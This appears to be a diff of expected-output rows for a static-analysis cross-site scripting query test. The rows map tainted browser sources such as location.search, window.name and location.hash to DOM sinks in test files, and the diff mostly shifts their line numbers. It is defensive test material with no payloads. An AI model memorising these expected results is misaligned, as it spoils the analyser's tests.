trusted-types-lib.js:2:12:2:12 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:13:20:13:30 | window.name | user-provided value | | trusted-types.js:3:67:3:67 | x | trusted-types.js:4:20:4:30 | window.name | trusted-types.js:3:67:3:67 | x | Cross-site scripting vulnerability due to $@. | trusted-types.js:4:20:4:30 | window.name | user-provided value | | tst3.js:4:25:4:32 | data.src | tst3.js:2:42:2:63 | window. ... .search | tst3.js:4:25:4:32 | data.src | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | @@ -1361,97 +1361,97 @@ subpaths | tst3.js:7:32:7:37 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:7:32:7:37 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | | tst3.js:9:37:9:42 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:9:37:9:42 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | | tst3.js:10:38:10:43 | data.p | tst3.js:2:42:2:63 | window. ... .search | tst3.js:10:38:10:43 | data.p | Cross-site scripting vulnerability due to $@. | tst3.js:2:42:2:63 | window. ... .search | user-provided value | -| tst.js:5:18:5:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:5:18:5:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:8:18:8:126 | "" | tst.js:8:37:8:58 | documen ... on.href | tst.js:8:18:8:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:8:37:8:58 | documen ... on.href | user-provided value | -| tst.js:12:5:12:42 | '
    ' | tst.js:2:16:2:39 | documen ... .search | tst.js:12:5:12:42 | '
    ' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:18:18:18:35 | params.get('name') | tst.js:17:25:17:41 | document.location | tst.js:18:18:18:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:17:25:17:41 | document.location | user-provided value | -| tst.js:21:18:21:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:21:18:21:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | -| tst.js:26:18:26:23 | target | tst.js:28:5:28:28 | documen ... .search | tst.js:26:18:26:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:28:5:28:28 | documen ... .search | user-provided value | -| tst.js:34:16:34:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:34:16:34:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:40:16:40:44 | baz(doc ... search) | tst.js:40:20:40:43 | documen ... .search | tst.js:40:16:40:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:40:20:40:43 | documen ... .search | user-provided value | -| tst.js:46:16:46:45 | wrap(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | -| tst.js:54:16:54:45 | chop(do ... search) | tst.js:54:21:54:44 | documen ... .search | tst.js:54:16:54:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:54:21:54:44 | documen ... .search | user-provided value | -| tst.js:56:16:56:45 | chop(do ... search) | tst.js:56:21:56:44 | documen ... .search | tst.js:56:16:56:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:56:21:56:44 | documen ... .search | user-provided value | -| tst.js:58:16:58:32 | wrap(chop(bar())) | tst.js:31:10:31:33 | documen ... .search | tst.js:58:16:58:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:64:25:64:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:64:25:64:48 | documen ... .search | user-provided value | -| tst.js:62:18:62:18 | s | tst.js:65:25:65:48 | documen ... .search | tst.js:62:18:62:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:65:25:65:48 | documen ... .search | user-provided value | -| tst.js:68:16:68:20 | bar() | tst.js:31:10:31:33 | documen ... .search | tst.js:68:16:68:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:31:10:31:33 | documen ... .search | user-provided value | -| tst.js:73:20:73:20 | x | tst.js:70:3:70:26 | documen ... .search | tst.js:73:20:73:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:70:3:70:26 | documen ... .search | user-provided value | -| tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | tst.js:77:49:77:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:77:49:77:72 | documen ... .search | user-provided value | -| tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | tst.js:81:26:81:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:81:26:81:49 | documen ... .search | user-provided value | -| tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | tst.js:82:25:82:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:25:82:48 | documen ... .search | user-provided value | -| tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... .search | tst.js:84:33:84:56 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:84:33:84:56 | documen ... .search | user-provided value | -| tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | tst.js:85:32:85:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:85:32:85:55 | documen ... .search | user-provided value | -| tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | tst.js:90:39:90:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:90:39:90:62 | documen ... .search | user-provided value | -| tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | tst.js:96:30:96:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:96:30:96:53 | documen ... .search | user-provided value | -| tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | tst.js:102:25:102:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:102:25:102:48 | documen ... .search | user-provided value | -| tst.js:110:18:110:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:110:18:110:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:136:18:136:18 | v | tst.js:107:11:107:34 | documen ... .search | tst.js:136:18:136:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:107:11:107:34 | documen ... .search | user-provided value | -| tst.js:151:49:151:49 | v | tst.js:148:29:148:50 | window. ... .search | tst.js:151:49:151:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:148:29:148:50 | window. ... .search | user-provided value | -| tst.js:155:29:155:46 | xssSourceService() | tst.js:158:40:158:61 | window. ... .search | tst.js:155:29:155:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:158:40:158:61 | window. ... .search | user-provided value | -| tst.js:180:28:180:33 | target | tst.js:177:18:177:41 | documen ... .search | tst.js:180:28:180:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:177:18:177:41 | documen ... .search | user-provided value | -| tst.js:186:31:186:37 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:186:31:186:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:188:42:188:48 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:188:42:188:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:189:33:189:39 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:189:33:189:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:191:54:191:60 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:191:54:191:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:192:45:192:51 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:192:45:192:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:193:49:193:55 | tainted | tst.js:184:19:184:42 | documen ... .search | tst.js:193:49:193:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:184:19:184:42 | documen ... .search | user-provided value | -| tst.js:199:67:199:73 | tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:199:67:199:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:200:67:200:73 | tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:200:67:200:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:212:28:212:46 | this.state.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:212:28:212:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:213:28:213:46 | this.state.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:213:28:213:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:214:28:214:46 | this.state.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:214:28:214:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:218:32:218:49 | prevState.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:218:32:218:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:225:28:225:46 | this.props.tainted1 | tst.js:197:19:197:42 | documen ... .search | tst.js:225:28:225:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:226:28:226:46 | this.props.tainted2 | tst.js:197:19:197:42 | documen ... .search | tst.js:226:28:226:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:227:28:227:46 | this.props.tainted3 | tst.js:197:19:197:42 | documen ... .search | tst.js:227:28:227:46 | this.props.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:231:32:231:49 | prevProps.tainted4 | tst.js:197:19:197:42 | documen ... .search | tst.js:231:32:231:49 | prevProps.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:251:60:251:82 | this.st ... Tainted | tst.js:197:19:197:42 | documen ... .search | tst.js:251:60:251:82 | this.st ... Tainted | Cross-site scripting vulnerability due to $@. | tst.js:197:19:197:42 | documen ... .search | user-provided value | -| tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | tst.js:259:7:259:17 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:259:7:259:17 | window.name | user-provided value | -| tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | tst.js:260:7:260:10 | name | Cross-site scripting vulnerability due to $@. | tst.js:260:7:260:10 | name | user-provided value | -| tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | tst.js:264:11:264:21 | window.name | Cross-site scripting vulnerability due to $@. | tst.js:264:11:264:21 | window.name | user-provided value | -| tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | tst.js:280:22:280:29 | location | Cross-site scripting vulnerability due to $@. | tst.js:280:22:280:29 | location | user-provided value | -| tst.js:288:59:288:65 | tainted | tst.js:285:19:285:29 | window.name | tst.js:288:59:288:65 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:285:19:285:29 | window.name | user-provided value | -| tst.js:303:20:303:20 | e | tst.js:301:9:301:16 | location | tst.js:303:20:303:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:301:9:301:16 | location | user-provided value | -| tst.js:311:20:311:20 | e | tst.js:308:10:308:17 | location | tst.js:311:20:311:20 | e | Cross-site scripting vulnerability due to $@. | tst.js:308:10:308:17 | location | user-provided value | -| tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | tst.js:316:35:316:42 | location | Cross-site scripting vulnerability due to $@. | tst.js:316:35:316:42 | location | user-provided value | -| tst.js:332:18:332:35 | params.get('name') | tst.js:327:18:327:34 | document.location | tst.js:332:18:332:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:327:18:327:34 | document.location | user-provided value | -| tst.js:343:5:343:30 | getUrl( ... ring(1) | tst.js:341:20:341:36 | document.location | tst.js:343:5:343:30 | getUrl( ... ring(1) | Cross-site scripting vulnerability due to $@. | tst.js:341:20:341:36 | document.location | user-provided value | -| tst.js:349:12:349:17 | target | tst.js:348:16:348:39 | documen ... .search | tst.js:349:12:349:17 | target | Cross-site scripting vulnerability due to $@. | tst.js:348:16:348:39 | documen ... .search | user-provided value | -| tst.js:356:16:356:21 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:356:16:356:21 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:360:21:360:26 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:360:21:360:26 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:363:18:363:23 | target | tst.js:355:19:355:42 | documen ... .search | tst.js:363:18:363:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:355:19:355:42 | documen ... .search | user-provided value | -| tst.js:374:18:374:23 | target | tst.js:371:16:371:39 | documen ... .search | tst.js:374:18:374:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:371:16:371:39 | documen ... .search | user-provided value | -| tst.js:384:18:384:23 | target | tst.js:381:16:381:39 | documen ... .search | tst.js:384:18:384:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:386:18:386:29 | target.taint | tst.js:381:16:381:39 | documen ... .search | tst.js:386:18:386:29 | target.taint | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:392:18:392:30 | target.taint3 | tst.js:391:19:391:42 | documen ... .search | tst.js:392:18:392:30 | target.taint3 | Cross-site scripting vulnerability due to $@. | tst.js:391:19:391:42 | documen ... .search | user-provided value | -| tst.js:397:18:397:30 | target.taint5 | tst.js:381:16:381:39 | documen ... .search | tst.js:397:18:397:30 | target.taint5 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:406:18:406:30 | target.taint7 | tst.js:381:16:381:39 | documen ... .search | tst.js:406:18:406:30 | target.taint7 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:409:18:409:30 | target.taint8 | tst.js:381:16:381:39 | documen ... .search | tst.js:409:18:409:30 | target.taint8 | Cross-site scripting vulnerability due to $@. | tst.js:381:16:381:39 | documen ... .search | user-provided value | -| tst.js:417:18:417:24 | payload | tst.js:416:17:416:36 | window.location.hash | tst.js:417:18:417:24 | payload | Cross-site scripting vulnerability due to $@. | tst.js:416:17:416:36 | window.location.hash | user-provided value | -| tst.js:421:20:421:27 | match[1] | tst.js:419:15:419:34 | window.location.hash | tst.js:421:20:421:27 | match[1] | Cross-site scripting vulnerability due to $@. | tst.js:419:15:419:34 | window.location.hash | user-provided value | -| tst.js:424:18:424:51 | window. ... '#')[1] | tst.js:424:18:424:37 | window.location.hash | tst.js:424:18:424:51 | window. ... '#')[1] | Cross-site scripting vulnerability due to $@. | tst.js:424:18:424:37 | window.location.hash | user-provided value | -| tst.js:430:18:430:89 | target. ... data>') | tst.js:428:16:428:39 | documen ... .search | tst.js:430:18:430:89 | target. ... data>') | Cross-site scripting vulnerability due to $@. | tst.js:428:16:428:39 | documen ... .search | user-provided value | -| tst.js:440:28:440:33 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:440:28:440:33 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:441:33:441:38 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:441:33:441:38 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:442:34:442:39 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:442:34:442:39 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:443:41:443:46 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:443:41:443:46 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:444:44:444:49 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:444:44:444:49 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:445:32:445:37 | source | tst.js:436:15:436:38 | documen ... .search | tst.js:445:32:445:37 | source | Cross-site scripting vulnerability due to $@. | tst.js:436:15:436:38 | documen ... .search | user-provided value | -| tst.js:455:18:455:23 | source | tst.js:453:16:453:39 | documen ... .search | tst.js:455:18:455:23 | source | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... .search | user-provided value | -| tst.js:456:18:456:42 | ansiToH ... source) | tst.js:453:16:453:39 | documen ... .search | tst.js:456:18:456:42 | ansiToH ... source) | Cross-site scripting vulnerability due to $@. | tst.js:453:16:453:39 | documen ... .search | user-provided value | -| tst.js:463:21:463:26 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:463:21:463:26 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:465:19:465:24 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:465:19:465:24 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:467:20:467:25 | source | tst.js:460:15:460:38 | documen ... .search | tst.js:467:20:467:25 | source | Cross-site scripting vulnerability due to $@. | tst.js:460:15:460:38 | documen ... .search | user-provided value | -| tst.js:473:19:473:21 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:473:19:473:21 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:474:26:474:28 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:474:26:474:28 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:475:25:475:27 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:475:25:475:27 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:476:20:476:22 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:476:20:476:22 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:486:22:486:24 | url | tst.js:471:13:471:36 | documen ... .search | tst.js:486:22:486:24 | url | Cross-site scripting vulnerability due to $@. | tst.js:471:13:471:36 | documen ... .search | user-provided value | -| tst.js:491:23:491:45 | locatio ... bstr(1) | tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:491:23:491:35 | location.hash | user-provided value | -| tst.js:494:18:494:40 | locatio ... bstr(1) | tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | Cross-site scripting vulnerability due to $@. | tst.js:494:18:494:30 | location.hash | user-provided value | -| tst.js:501:33:501:63 | decodeU ... n.hash) | tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | Cross-site scripting vulnerability due to $@. | tst.js:501:43:501:62 | window.location.hash | user-provided value | -| tst.js:509:18:509:54 | target. ... "), '') | tst.js:508:16:508:39 | documen ... .search | tst.js:509:18:509:54 | target. ... "), '') | Cross-site scripting vulnerability due to $@. | tst.js:508:16:508:39 | documen ... .search | user-provided value | +| tst.js:4:18:4:23 | target | tst.js:2:16:2:39 | documen ... .search | tst.js:4:18:4:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:6:18:6:126 | "" | tst.js:6:37:6:58 | documen ... on.href | tst.js:6:18:6:126 | "" | Cross-site scripting vulnerability due to $@. | tst.js:6:37:6:58 | documen ... on.href | user-provided value | +| tst.js:9:5:9:42 | '
    ' | tst.js:2:16:2:39 | documen ... .search | tst.js:9:5:9:42 | '
    ' | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:15:18:15:35 | params.get('name') | tst.js:14:25:14:41 | document.location | tst.js:15:18:15:35 | params.get('name') | Cross-site scripting vulnerability due to $@. | tst.js:14:25:14:41 | document.location | user-provided value | +| tst.js:18:18:18:41 | searchP ... 'name') | tst.js:2:16:2:39 | documen ... .search | tst.js:18:18:18:41 | searchP ... 'name') | Cross-site scripting vulnerability due to $@. | tst.js:2:16:2:39 | documen ... .search | user-provided value | +| tst.js:22:18:22:23 | target | tst.js:24:5:24:28 | documen ... .search | tst.js:22:18:22:23 | target | Cross-site scripting vulnerability due to $@. | tst.js:24:5:24:28 | documen ... .search | user-provided value | +| tst.js:29:16:29:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:34:16:34:44 | baz(doc ... search) | tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | Cross-site scripting vulnerability due to $@. | tst.js:34:20:34:43 | documen ... .search | user-provided value | +| tst.js:39:16:39:45 | wrap(do ... search) | tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:39:21:39:44 | documen ... .search | user-provided value | +| tst.js:46:16:46:45 | chop(do ... search) | tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:46:21:46:44 | documen ... .search | user-provided value | +| tst.js:47:16:47:45 | chop(do ... search) | tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | Cross-site scripting vulnerability due to $@. | tst.js:47:21:47:44 | documen ... .search | user-provided value | +| tst.js:48:16:48:32 | wrap(chop(bar())) | tst.js:27:10:27:33 | documen ... .search | tst.js:48:16:48:32 | wrap(chop(bar())) | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:53:25:53:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:53:25:53:48 | documen ... .search | user-provided value | +| tst.js:51:18:51:18 | s | tst.js:54:25:54:48 | documen ... .search | tst.js:51:18:51:18 | s | Cross-site scripting vulnerability due to $@. | tst.js:54:25:54:48 | documen ... .search | user-provided value | +| tst.js:56:16:56:20 | bar() | tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | Cross-site scripting vulnerability due to $@. | tst.js:27:10:27:33 | documen ... .search | user-provided value | +| tst.js:60:20:60:20 | x | tst.js:58:3:58:26 | documen ... .search | tst.js:60:20:60:20 | x | Cross-site scripting vulnerability due to $@. | tst.js:58:3:58:26 | documen ... .search | user-provided value | +| tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | tst.js:63:49:63:72 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:63:49:63:72 | documen ... .search | user-provided value | +| tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | tst.js:67:26:67:49 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:67:26:67:49 | documen ... .search | user-provided value | +| tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | tst.js:68:25:68:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:68:25:68:48 | documen ... .search | user-provided value | +| tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... .search | tst.js:70:33:70:56 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:70:33:70:56 | documen ... .search | user-provided value | +| tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | tst.js:71:32:71:55 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:71:32:71:55 | documen ... .search | user-provided value | +| tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | tst.js:76:39:76:62 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:76:39:76:62 | documen ... .search | user-provided value | +| tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | tst.js:82:30:82:53 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:82:30:82:53 | documen ... .search | user-provided value | +| tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | tst.js:88:25:88:48 | documen ... .search | Cross-site scripting vulnerability due to $@. | tst.js:88:25:88:48 | documen ... .search | user-provided value | +| tst.js:95:18:95:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:95:18:95:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:120:18:120:18 | v | tst.js:93:11:93:34 | documen ... .search | tst.js:120:18:120:18 | v | Cross-site scripting vulnerability due to $@. | tst.js:93:11:93:34 | documen ... .search | user-provided value | +| tst.js:135:49:135:49 | v | tst.js:132:29:132:50 | window. ... .search | tst.js:135:49:135:49 | v | Cross-site scripting vulnerability due to $@. | tst.js:132:29:132:50 | window. ... .search | user-provided value | +| tst.js:139:29:139:46 | xssSourceService() | tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | Cross-site scripting vulnerability due to $@. | tst.js:142:40:142:61 | window. ... .search | user-provided value | +| tst.js:164:28:164:33 | target | tst.js:161:18:161:41 | documen ... .search | tst.js:164:28:164:33 | target | Cross-site scripting vulnerability due to $@. | tst.js:161:18:161:41 | documen ... .search | user-provided value | +| tst.js:170:31:170:37 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:170:31:170:37 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:172:42:172:48 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:172:42:172:48 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:173:33:173:39 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:173:33:173:39 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:175:54:175:60 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:175:54:175:60 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:176:45:176:51 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:176:45:176:51 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:177:49:177:55 | tainted | tst.js:168:19:168:42 | documen ... .search | tst.js:177:49:177:55 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:168:19:168:42 | documen ... .search | user-provided value | +| tst.js:183:67:183:73 | tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:183:67:183:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:184:67:184:73 | tainted | tst.js:181:19:181:42 | documen ... .search | tst.js:184:67:184:73 | tainted | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:196:28:196:46 | this.state.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:196:28:196:46 | this.state.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:197:28:197:46 | this.state.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:197:28:197:46 | this.state.tainted2 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:198:28:198:46 | this.state.tainted3 | tst.js:181:19:181:42 | documen ... .search | tst.js:198:28:198:46 | this.state.tainted3 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:202:32:202:49 | prevState.tainted4 | tst.js:181:19:181:42 | documen ... .search | tst.js:202:32:202:49 | prevState.tainted4 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:209:28:209:46 | this.props.tainted1 | tst.js:181:19:181:42 | documen ... .search | tst.js:209:28:209:46 | this.props.tainted1 | Cross-site scripting vulnerability due to $@. | tst.js:181:19:181:42 | documen ... .search | user-provided value | +| tst.js:210:28:210:46 | this.props.tainted2 | tst.js:181:19:181:42 | documen ... .search | tst.js:210:28:210:46 | this.props.tainted2 | Cross-site scripting vulnerability due to $@. | 